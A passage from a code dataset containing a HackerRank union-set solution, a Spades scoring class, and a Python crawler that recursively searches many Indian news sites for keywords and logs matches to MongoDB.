range(len(a_set_list)):\n if a in a_set_list[i]:\n return i\n\ndef journeyToMoon(n, astronaut):\n for a1, a2 in astronaut:\n i1, i2 = find_set_index(a1), find_set_index(a2)\n if i1 != i2:\n a_set_list[i1] = a_set_list[i1].union(a_set_list[i2])\n del a_set_list[i2]\n print(a_set_list)\n sum, res = 0, 0\n for s in a_set_list:\n res += sum * len(s)\n sum += len(s)\n print(res, sum)\n return res\n\nn, p = map(int, input().split())\n\nastronauts = []\nfor _ in range(p):\n astronauts.append(list(map(int, input().split())))\n\na_set_list = [{x} for x in range(n)]\nresult = journeyToMoon(n, astronauts)\nprint(result)","repo_name":"graygreat/algorithm-study","sub_path":"HackerRank/JourneyToTheMoon.py","file_name":"JourneyToTheMoon.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21750079666","text":"from relative_data import RelativeData\n\n\nclass Score(RelativeData):\n\n\tdef __init__(self, reference_id=0, playing_to=500):\n\t\tsuper().__init__(reference_id)\n\t\tself.data = {0: 0, 1: 0}\n\t\tself.score = self.data\n\t\tself.data_size = 2\n\t\tself.playing_to = playing_to\n\n\tdef add_score(self, new_score, team_id):\n\t\t\"\"\"\"Add points to a team's score.\"\"\"\n\t\tglobal_id = self.globalize_id(team_id)\n\t\tself.score[global_id] += new_score\n\n\tdef can_blind(self, player_id):\n\t\t\"\"\"\"Return whether the team of this player is eligible for a Blind Nill this round\"\"\"\n\t\tglobal_team_id = self.globalize_id(player_id)\n\t\tother_team_id = self.globalize_id(player_id + 1)\n\t\treturn self.score[global_team_id] <= self.score[other_team_id] - 100\n\n\tdef get_winner(self, intermediate_winner=False):\n\t\t\"\"\"Return the team that won the match, if any\"\"\"\n\t\tif intermediate_winner or not (-self.playing_to < self.score[0] < self.playing_to) or not (-self.playing_to < self.score[1] < self.playing_to):\n\t\t\tif self.score[0] == self.score[1]:\n\t\t\t\treturn None\n\t\t\treturn max(self.score, key=lambda team_id: self.score[team_id])\n\t\treturn None\n\n\tdef __str__(self):\n\t\tteam_0_id = self.localize_id(0)\n\t\tteam_1_id = self.localize_id(1)\n\t\treturn \"Scores: Team 0: \" + str(self.score[team_0_id]) + \" Team 1: \" + str(self.score[team_1_id])\n\n\n","repo_name":"Metamess/Spades","sub_path":"score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"25046580562","text":"# websiteTxtSearcher.py\r\n# Searches a website recursively for any given string.\r\n# FB - 201009105\r\nimport urllib.request\r\nfrom os.path import basename\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.parse import urlparse\r\nimport logging\r\nimport datetime\r\nimport traceback\r\nimport pymongo\r\nfrom pymongo import MongoClient\r\nimport time\r\nimport sys\r\nimport config\r\nimport re\r\n\r\n# recursively search starting from the root URL\r\ndef searchUrl(url, level, keywords, rootUrl , urlListProbed , document , db): # the root URL is level 0\r\n # do not go to other websites\r\n\to = urlparse(url)\r\n\tlogging.getLogger().info(o.geturl())\r\n\tif o.netloc.find(rootUrl) < 0:\r\n\t\treturn\r\n\r\n\tif url in urlListProbed: # prevent using the same URL again\r\n\t\treturn\r\n\r\n\ttry:\r\n\t\turlListProbed.append(url)\r\n\t\tif config.mode == \"test\":\r\n\t\t\tprint(\"Processing URL: \" + o.geturl())\r\n\t\tif is_url_visited(url , db) == False:\r\n\t\t\treq = urllib.request.Request(url , headers={'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'})\r\n\t\t\turlContent = urllib.request.urlopen(req).read()\r\n\t\telse:\r\n\t\t\tprint(\"url already visited : \" + o.geturl())\r\n\t\t\treturn\r\n\r\n\texcept Exception as e:\r\n\t\tlogging.getLogger().exception(o.geturl())\r\n\t\treturn\r\n\r\n\tsoup = BeautifulSoup(urlContent, \"lxml\")\r\n\t\r\n\t# remove script tags\r\n\tc = soup.find_all('script')\r\n\tfor i in c:\r\n\t\ti.extract() \r\n\r\n\tresult = None\r\n\tif rootUrl == 'indianexpress.com':\r\n\t\tresult = searchIndianExpress(soup , keywords )\r\n\telif rootUrl == 'www.thehindu.com':\r\n\t\tresult = searchTheHindu(soup , keywords )\r\n\telif rootUrl == 'timesofindia.indiatimes.com':\r\n\t\tresult = searchTOI(soup , keywords)\r\n\telif rootUrl == 'www.aninews.in':\r\n\t\tresult = searchANINews(soup , keywords)\r\n\telif rootUrl == 'www.newindianexpress.com':\r\n\t\tresult = searchNewindianexpress(soup , keywords)\r\n\telif rootUrl == 'zeenews.india.com':\r\n\t\tresult = searchZeeNews(soup , keywords)\r\n\telif rootUrl.find('dnaindia.com') >=0 :\r\n\t\tresult = searchDNAIndia(soup , keywords)\r\n\telif rootUrl == 'www.sundayguardianlive.com':\r\n\t\tresult = searchSundayGuardin(soup , keywords)\r\n\telif rootUrl == 'www.hindustantimes.com':\r\n\t\tresult = searchHindustanTimes(soup , keywords)\r\n\telif rootUrl == 'www.theguardian.com':\r\n\t\tresult = searchTheGuardian(soup , keywords)\r\n\telif rootUrl == 'www.ndtv.com':\r\n\t\tresult = searchNDTV(soup , keywords)\r\n\telif rootUrl == 'www.mid-day.com':\r\n\t\tresult = searchMidDay(soup , keywords)\r\n\telif rootUrl == 'www.news18.com':\r\n\t\tresult = searchNews18(soup , keywords)\r\n\telif rootUrl == 'www.opindia.com':\r\n\t\tresult = searchOpIndia(soup , keywords)\r\n\telif rootUrl == 'www.livemint.com':\r\n\t\tresult = searchLiveMint(soup , keywords)\r\n\telif rootUrl == 'www.sirfnews.com':\r\n\t\tresult = searchSirfNews(soup , keywords)\r\n\telif rootUrl.find('in.reuters.com') >= 0:\r\n\t\tresult = searchReuters(soup , keywords)\r\n\telif rootUrl.find('swarajyamag.com') >= 0:\r\n\t\tresult = searchSwarajya(soup , keywords)\r\n\telif rootUrl == 'currentriggers.com':\r\n\t\tresult = searchCurrentRiggers(soup , keywords)\r\n\telif rootUrl == 'satyavijayi.com':\r\n\t\tresult = searchSatyaVijayi(soup , keywords)\r\n\telif rootUrl == 'www.hindupost.in':\r\n\t\tresult = searchHinduPost(soup , keywords)\r\n\telif rootUrl.find('simplecapacity.com') >= 0:\r\n\t\tresult = searchSimpleCapacity(soup , keywords)\r\n\telif rootUrl == 'www.worldreligionnews.com':\r\n\t\tresult = searchWorldReligionNews(soup , keywords)\r\n\telif rootUrl == 'worldhindunews.com':\r\n\t\tresult = searchWorldHinduNews(soup , keywords)\r\n\telif rootUrl == 'www.dailyo.in':\r\n\t\tresult = searchDailyo(soup , keywords)\r\n\telif rootUrl == 'www.avenuemail.in':\r\n\t\tresult = searchAvenuemaol(soup , keywords)\r\n\telif rootUrl == 'hinduexistence.org':\r\n\t\tresult = searchHinduExistence(soup , keywords)\r\n\telif rootUrl == 'www.hinduhumanrights.info':\r\n\t\tresult = searchHinduHumanRights(soup , keywords)\r\n\telif rootUrl == 'www.hindujagruti.org':\r\n\t\tresult = searchHinduJagruti(soup , keywords)\r\n\telif rootUrl == 'www.mediacrooks.com':\r\n\t\tresult = searchMediaCrooks(soup , keywords)\r\n\telif rootUrl == 'deccanherald.com':\r\n\t\tresult = searchDeccanHerald(soup , keywords)\t\r\n\telif rootUrl == 'deccanchronicle.com':\r\n\t\tresult = searchDeccanChronicle(soup , keywords)\t\r\n\telif rootUrl == 'business-standard.com':\r\n\t\tresult = searchBusinessStandard(soup , keywords)\r\n\telif rootUrl.find('thehindubusinessline.com') >=0 :\r\n\t\tresult = searchHinduBusinessLine(soup , keywords)\t\r\n\telif rootUrl == 'telegraphindia.com':\r\n\t\tresult = searchTelegraph(soup , keywords)\t\r\n\telif rootUrl == 'economictimes.indiatimes.com':\r\n\t\tresult = searchEconomicTimes(soup , keywords)\r\n\telif rootUrl == 'www.firstpost.com':\r\n\t\tresult = searchFirstPost(soup , keywords)\r\n\telif rootUrl == 'dailypost.in':\r\n\t\tresult = searchDailyPost(soup , keywords)\r\n\telif rootUrl == 'bangaloremirror.com':\r\n\t\tresult = searchBangaloreMirror(soup , keywords)\r\n\telif rootUrl == 'tribuneindia.com':\r\n\t\tresult = searchTribuneIndia(soup , keywords)\r\n\telif rootUrl == 'asianage.com':\r\n\t\tresult = searchAsianAge(soup , keywords)\r\n\telif rootUrl == 'scroll.in':\r\n\t\tresult = searchScroll(soup , keywords)\r\n\telif rootUrl == 'telanganatoday.com':\r\n\t\tresult = searchTelanganaToday(soup , keywords)\r\n\telif rootUrl == 'www.thebetterindia.com':\r\n\t\tresult = searchBetterIndia(soup , keywords)\r\n\telif rootUrl == 'financialexpress.com':\r\n\t\tresult = searchFinancialExpress(soup , keywords)\r\n\telif rootUrl == 'freepressjournal.in':\r\n\t\tresult = searchFreePressJournal(soup , keywords)\r\n\telif rootUrl == 'www.greaterkashmir.com':\r\n\t\tresult = searchGreaterKashmirJournal(soup , keywords)\r\n\telif rootUrl == 'mumbaimirror.com':\r\n\t\tresult = searchMumbaiMirror(soup , keywords)\r\n\telif rootUrl == 'www.nagalandpost.com':\r\n\t\tresult = searchNagalandPost(soup , keywords)\r\n\telif rootUrl == 'www.dailypioneer.com':\r\n\t\tresult = searchDailyPioneer(soup , keywords)\r\n\telif rootUrl == 'news.statetimes.in':\r\n\t\tresult = searchStateTimes(soup , keywords)\r\n\telif rootUrl == 'www.starofmysore.com':\r\n\t\tresult = searchStarOfMysore(soup , keywords)\r\n\telif rootUrl == 'www.navhindtimes.in':\r\n\t\tresult = searchNacHindTimes(soup , keywords)\r\n\telif rootUrl == 'morungexpress.com':\r\n\t\tresult = searchMorungExpress(soup , keywords)\t\r\n\telif rootUrl == 'newstodaynet.com':\r\n\t\tresult = searchNewsTodayNet(soup , keywords)\t\r\n\telif rootUrl == 'theshillongtimes.com':\r\n\t\tresult = searchTheShillongTimes(soup , keywords)\t\r\n\telif rootUrl == 'www.newsgram.com':\r\n\t\tresult = searchNewsGram(soup , keywords)\r\n\telif rootUrl == 'www.pacifiermedia.com':\r\n\t\tresult = searchPacificMedia(soup , keywords)\r\n\telif rootUrl == 'www.haindavakeralam.com':\r\n\t\tresult = searchHaindavakeralam(soup , keywords)\r\n\telif rootUrl == 'says.com':\r\n\t\tresult = searchSays(soup , keywords)\r\n\telif rootUrl == 'www.chakranews.com':\r\n\t\tresult = searchChakraNews(soup , keywords)\r\n\telif rootUrl == 'www.mysteryofindia.com':\r\n\t\tresult = searchMysteryOfIndia(soup , keywords)\r\n\telif rootUrl == 'dharmatoday.com':\r\n\t\tresult = searchDharmaToday(soup , keywords)\r\n\telif rootUrl == 'postcard.news':\r\n\t\tresult = searchPostcardNews(soup , keywords)\r\n\telif rootUrl == 'www.thehansindia.com':\r\n result = searchHansIndia(soup , keywords)\r\n\telse:\r\n\t\tprint(\"This speicific Site is yet to be implemented \" + rootUrl)\t\r\n\t\treturn\r\n\t\r\n\t#\".\" is not a valid for field name in mongo\r\n\tkey = rootUrl.replace(\".\" , \"_\")\r\n\t# Check if the key for this rootUrl exist\r\n\tif key not in document:\r\n\t\tsiteDetail = {}\r\n\t\tsiteDetail[\"key_match_count\"] = 0\r\n\t\tsiteDetail[\"tag_match_count\"] = 0\r\n\t\tsiteDetail[\"children\"] = []\r\n\t\tdocument[key] = siteDetail\r\n\telse:\r\n\t\tsiteDetail = document[key]\r\n\r\n\tif result[\"tag_match\"] == True:\r\n\t\tsiteDetail[\"tag_match_count\"] = siteDetail[\"tag_match_count\"] + 1\r\n\t\t#Only mark the URL's as visited if there is a tag match. This is to avoid the scenaatio of skipping\r\n\t\t# the main website for every successive run\r\n\t\tmark_url_visited(url , db)\r\n\t\r\n\tif result[\"keyword_match\"] == True:\r\n\t\tlog_result(url)\r\n\t\tsiteDetail[\"key_match_count\"] = siteDetail[\"key_match_count\"] + 1 \r\n\t\turlDetail = {}\r\n\t\turlDetail[\"link\"] = url\r\n\t\turlDetail[\"headline\"] = result[\"headline\"]\r\n\t\turlDetail[\"author\"] = result[\"author\"]\r\n\t\tsiteDetail[\"children\"].append(urlDetail)\r\n\t\t\t\r\n # if there are links on the webpage then recursively repeat\r\n\tif level > 0:\r\n\t\tlinkTags = soup.find_all('a')\r\n\t\tif len(linkTags) > 0:\r\n\t\t\tfor linkTag in linkTags:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tlinkUrl = linkTag['href']\r\n\t\t\t\t\tif linkUrl.startswith(\"http\") == False:\r\n\t\t\t\t\t\tif linkUrl[0] == '/':\r\n\t\t\t\t\t\t\tlinkUrl = o.scheme + \"://\" + rootUrl + linkUrl\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tlinkUrl = o.scheme + \"://\" + rootUrl +\"/\"+ linkUrl\r\n\t\t\t\t\tsearchUrl(linkUrl, level - 1, keywords , rootUrl , urlListProbed , document , db)\r\n\t\t\t\texcept:\r\n\t\t\t\t\tpass\r\n\r\ndef searchIndianExpress(soup , keywords):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tschema = soup.find(\"html\" , itemtype='http://schema.org/Article')\r\n\t\theadlines = soup.find_all(\"h1\" , itemprop=\"headline\")\r\n\t\tif schema is not None and len(headlines) == 1:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\tif(genSearchParagraph(soup.find_all(\"p\") , keywords) is not None):\r\n\t\t\t\tresult[\"keyword_match\"] = True\r\n\t\t\t\tresult[\"headline\"] = headlines[0].get_text()\r\n\t\t\t\tauthor = soup.find_all(\"div\" , class_=\"editor\")\r\n\t\t\t\tresult[\"author\"] = author[0].get_text()\r\n\t\t\t\tresult[\"author\"] = result[\"author\"].replace(\"\\n\" , \" \")\r\n\t\t\t\tresult[\"author\"] = result[\"author\"].replace(\"\\t\" , \"\")\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\treturn result\r\n\t\r\ndef searchTheHindu(soup , keywords):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tt = soup.find(\"div\",class_=\"article-topics-container\")\r\n\t\tif t is not None:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\tparagraphs = soup.find_all(\"p\")\r\n\t\t\tfor p in paragraphs:\r\n\t\t\t\tif len(p.attrs) > 0:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tfor searchText in keywords:\r\n\t\t\t\t\tif(p.get_text().find(searchText)) > -1 :\r\n\t\t\t\t\t\tresult[\"keyword_match\"] = True\r\n\t\t\t\t\t\treturn result\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\treturn result\r\n\t\t\t\t\r\ndef searchTOI(soup , keywords):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tschema = soup.find(\"html\" , itemtype='https://schema.org/NewsArticle')\r\n\t\tif schema is not None:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\tcontent_text = (soup.find(\"div\" , itemprop=\"articleBody\")).get_text()\r\n\t\t\tfor searchText in keywords:\r\n\t\t\t\tif(content_text.find(searchText)) > -1 :\r\n\t\t\t\t\tresult[\"keyword_match\"] = True\r\n\t\t\t\t\tbreak\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\treturn result\r\n\r\ndef searchANINews(soup , keywords):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tart = soup.find(\"article\")\r\n\t\tif art is not None:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\tcontent_text = art.get_text()\r\n\t\t\tfor searchText in keywords:\r\n\t\t\t\tif(content_text.find(searchText)) > -1 :\r\n\t\t\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\treturn result\r\n\t\r\ndef searchNewindianexpress(soup , keywords):\r\n\treturn searchPage1(soup , keywords , \"article\" , {})\r\n\r\ndef searchPage(soup , keywords , elementTag , filters , lengthCheck=None):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tif isinstance(filters , dict) :\r\n\t\t\tcontent = soup.find_all(elementTag , filters)\r\n\t\telif isinstance(filters , str) :\r\n\t\t\tcontent = soup.select(filters)\r\n\t\tif lengthCheck is None and len(content) != 0:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\telif len(content) == lengthCheck:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\tif result[\"tag_match\"] == True:\r\n\t\t\tparagraphs = content[0].find_all(\"p\")\r\n\t\t\tif genSearchParagraph(paragraphs , keywords) is not None:\r\n\t\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\ts = \"elementTag: \" + str(elementTag) + \" filters: \" + str(filters) + \" lengthCheck:\" + str(lengthCheck)\r\n\tlogging.getLogger().info(s)\r\n\treturn result\r\n\r\n# Does not get the paragraph, rather searches the elements itself\r\ndef searchPage1(soup , keywords , elementTag , filters):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tif isinstance(filters , dict) :\r\n\t\t\tcontent = soup.find_all(elementTag , filters)\r\n\t\telif isinstance(filters , str) :\r\n\t\t\tcontent = soup.select(filters)\r\n\t\tif len(content) != 0 :\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\tif genSearchParagraph(content , keywords) is not None:\r\n\t\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\treturn result\r\n\r\ndef searchPage2(soup , keywords , elementTag , filters , paragraphFilterText):\r\n\tresult = init_result()\r\n\ts = \"elementTag: \" + str(elementTag) + \" filters: \" + str(filters) + \" paragraphFilterText:\" + str(paragraphFilterText)\r\n\tlogging.getLogger().info(s)\r\n\r\n\ttry:\r\n\t\tif isinstance(filters , dict) :\r\n\t\t\tcontent = soup.find_all(elementTag , filters)\r\n\t\telif isinstance(filters , str) :\r\n\t\t\tcontent = soup.select(filters)\r\n\t\tif len(content) != 0 :\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\tparagraphs = content[0].find_all(\"p\")\r\n\t\t\tparagraphs = filterParagraphs(content[0].find_all(\"p\") , paragraphFilterText)\r\n\t\t\tif genSearchParagraph(paragraphs , keywords) is not None:\r\n\t\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\treturn result\r\n\t\r\ndef searchPage4(soup , keywords , elementTag , filters ):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tif isinstance(filters , dict) :\r\n\t\t\tcontent = soup.find_all(elementTag , filters)\r\n\t\telif isinstance(filters , str) :\r\n\t\t\tcontent = soup.select(filters)\r\n\t\tif lengthCheck is None and len(content) != 0:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\telif len(content) == lengthCheck:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\tif result[\"tag_match\"] == True:\r\n\t\t\tif genSearchParagraph(content , keywords) is not None:\r\n\t\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\treturn result\r\n\t\r\ndef searchZeeNews(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"section\" , {\"class\": 'main-article'})\r\n\r\ndef searchDNAIndia(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , {\"class\": 'article-content'})\r\n\t\r\ndef searchSundayGuardin(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"div.field-content.field-name-body-article\")\r\n\r\ndef searchHindustanTimes(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\": 'story-details' , \"itemprop\":\"articlebody\" })\r\n\r\ndef searchTheGuardian(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"itemprop\":\"articleBody\" })\r\n\t\r\ndef searchNDTV(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"itemprop\":\"articleBody\" })\r\n\r\ndef searchMidDay(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"span\" , {\"itemprop\":\"articleBody\" })\r\n\t\r\ndef searchNews18(soup , keywords):\r\n\treturn searchPage1(soup , keywords , \"div\" , {\"id\":\"article_body\" })\r\n\t\r\ndef searchOpIndia(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"id\":\"content-main\" })\r\n\r\ndef searchLiveMint(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"content-box\" })\r\n\r\ndef searchSirfNews(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"td-post-content\" })\r\n\r\ndef searchReuters(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":re.compile(\"PrimaryAsset_container\") })\r\n\r\ndef searchSwarajya(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"div.story-element.story-element-text\")\r\n\r\ndef searchCurrentRiggers(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"entry-content\" })\r\n\r\ndef searchSatyaVijayi(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"td-post-content\" })\r\n\r\ndef searchHinduPost(soup , keywords):\r\n\treturn searchPage2(soup , keywords , \"div\" , {\"id\":\"main-content\" , \"class\":\"mh-content\"} , \"and help pay for our journalism\")\r\n\r\ndef searchSimpleCapacity(soup , keywords):\t\r\n\treturn searchPage2(soup , keywords , \"div\" , {\"id\":\"content-main\" } , \"Your email address will not be published\")\r\n\r\ndef searchWorldReligionNews(soup , keywords):\r\n\treturn searchPage2(soup , keywords , \"div\" , {\"itemprop\":\"articleBody\" , \"class\":\"articlebody\" } , \"Your email address will not be published\")\r\n\r\ndef searchWorldHinduNews(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"entry-content\" })\r\n\r\ndef searchDailyo(soup , keywords):\r\n\treturn searchPage2(soup , keywords , \"div\" , {\"class\":\"mediumcontent\" } , 'title=\"Also read:')\r\n\r\ndef\tsearchAvenuemaol(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"div.elements-box.mt-20\")\r\n\r\ndef searchHinduExistence(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"id\":\"single\" })\r\n\r\ndef searchHinduHumanRights(soup , keywords):\r\n\treturn searchPage2(soup , keywords , \"div\" , {\"class\":\"single-content\" } , '

    ')\r\n\r\ndef searchHinduJagruti(soup , keywords):\r\n\tif len(soup.select(\"body.news-template-default.single.single-news\" )) == 1:\r\n\t\treturn searchPage(soup , keywords , \"div\" , {\"id\":\"content\" , \"role\":\"main\" , \"class\":\"site-content\" })\r\n\telse:\r\n\t\treturn init_result()\r\n\r\ndef searchMediaCrooks(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"div.post-body.entry-content\" , 1)\r\n\t\r\ndef searchDeccanHerald(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"newsText\" },1)\r\n\r\ndef searchDeccanChronicle(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"id\":\"storyBody\" })\r\n\t\r\ndef searchBusinessStandard(soup , keywords):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tcontent = soup.find_all(\"div\" , class_=\"story-content\")\r\n\t\tif content is not None:\r\n\t\t\treturn result\r\n\t\tif len(content) != 1:\r\n\t\t\treturn result\r\n\t\tresult[\"tag_match\"] = True\r\n\t\ttextContent = content[0].find(\"span\" , class_ = \"p-content\")\r\n\t\tif genSearchParagraph([textContent] , keywords) is not None:\r\n\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tpass\r\n\treturn result\r\n\r\ndef searchHinduBusinessLine(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"article-text\" },1)\r\n\r\ndef searchTelegraph(soup , keywords):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tp = soup.find(\"td\" , class_=\"articleheader\")\r\n\t\tif p is not None:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\ttable = p.parent.parent\r\n\t\t\tif genSearchParagraph([table] , keywords) is not None:\r\n\t\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tpass\r\n\treturn result\t\t\r\n\r\ndef searchEconomicTimes(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"section1\" })\r\n\r\ndef searchFirstPost(soup , keywords):\t\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"article-full-content\" , \"itemprop\":\"articleBody\" })\r\n\r\ndef searchDailyPost(soup , keywords):\r\n\treturn searchPage2(soup , keywords , \"div\" , {\"class\":\"post_content\" } , 'For more news updates Follow and Like us on')\r\n\t\r\ndef searchBangaloreMirror(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , {\"id\":\"storydiv\" })\r\n\t\r\ndef searchTribuneIndia(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"span\" , {\"class\":\"storyText\" })\r\n\t\r\ndef searchAsianAge(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"id\":\"storyBody\" })\r\n\r\ndef searchScroll(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"section.article-content.scroll-article-content.latest-article-content\")\r\n\r\ndef searchTelanganaToday(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"div.entry-content\")\r\n\r\ndef searchBetterIndia(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , {\"itemprop\":\"articleBody\" } , 1)\r\n\r\ndef searchFinancialExpress(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"itemprop\":\"articleBody\" , \"class\":\"main-story-content\" } , 1)\r\n\r\ndef searchFreePressJournal(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"itemprop\":\"articleBody\" })\r\n\r\ndef searchGreaterKashmirJournal(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"span\" , {\"class\":\"storyText\" })\r\n\r\ndef searchMumbaiMirror(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"id\":\"storydiv\" } , 1)\r\n\r\ndef searchNagalandPost(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"NewsDetail\" } )\r\n\r\ndef searchDailyPioneer(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"span\" , {\"itemprop\":\"articleBody\" } )\r\n\t\r\ndef searchStateTimes(soup , keywords):\r\n\tif len(soup.select(\"div.mom-post-meta.single-post-meta\")) == 1:\r\n\t\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"pf-content\" } )\r\n\telse:\r\n\t\treturn init_result()\r\n\r\ndef searchStarOfMysore(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"entry-content\" } , 1 )\r\n\r\ndef searchNacHindTimes(soup , keywords):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tp = soup.find(\"article\" )\r\n\t\tif p is not None:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\tcontent = p.find(\"div\" , class_=\"post-inner\")\r\n\t\t\tif genSearchParagraph(content.find_all(\"p\") , keywords) is not None:\r\n\t\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tpass\r\n\treturn result\t\t\r\n\r\ndef searchMorungExpress(soup , keywords):\r\n\treturn searchPage2(soup , keywords , None , {\"id\":\"main2\" } , 'class=\"meta_permalink\">')\r\n\t\r\ndef searchNewsTodayNet(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"itemprop\":\"articleBody\" } )\r\n\r\ndef searchTheShillongTimes(soup , keywords)\t:\r\n\treturn searchPage4(soup , keywords , None , \"div.single-post-content.entry-content\" )\r\n\r\ndef searchNewsGram(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"div.td-post-content\" )\r\n\r\ndef searchPacificMedia(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , {\"class\":\"entry-content\"} )\r\n\t\r\ndef searchHaindavakeralam(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , {\"id\":\"news-item\"} )\r\n\t\r\ndef searchSays(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"story-middle\"} )\r\n\t\r\ndef searchChakraNews(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"article\" , {\"itemtype\":\"http://schema.org/CreativeWork\"} )\r\n\r\ndef searchMysteryOfIndia(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"td-post-content\"} )\r\n\r\ndef\tsearchDharmaToday(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"id\":\"blog-post-body-content\"} )\r\n\r\ndef searchPostcardNews(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"article\" , {} )\r\n\r\ndef searchHansIndia(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"div.fullwidth.pull-left.artical-panel\" )\r\n\t\r\ndef genSearchParagraph(elements , keywords):\r\n\tfor p in elements:\r\n\t\tfor searchText in keywords:\r\n\t\t\tif(p.get_text().find(searchText)) > -1 :\r\n\t\t\t\treturn searchText\r\n\treturn None\r\n\r\ndef filterParagraphs(paragraphs , searchText):\r\n\tidx = 0\r\n\tfor i in paragraphs:\r\n\t\tif(str(i).find(searchText)) > -1:\r\n\t\t\tbreak\r\n\t\tidx+=1\r\n\tnewp = paragraphs[:idx]\r\n\treturn newp\r\n\r\ndef log_error(error_str):\r\n\terr_log_f = open(config.error_file , \"a+\")\r\n\terr_log_f.write(error_str)\r\n\terr_log_f.write(\"\\n\")\r\n\terr_log_f.close()\t\r\n\t\r\n#done to truncate the result file before the run.\r\ndef log_result(result_str):\r\n\tf = open(config.result_file , 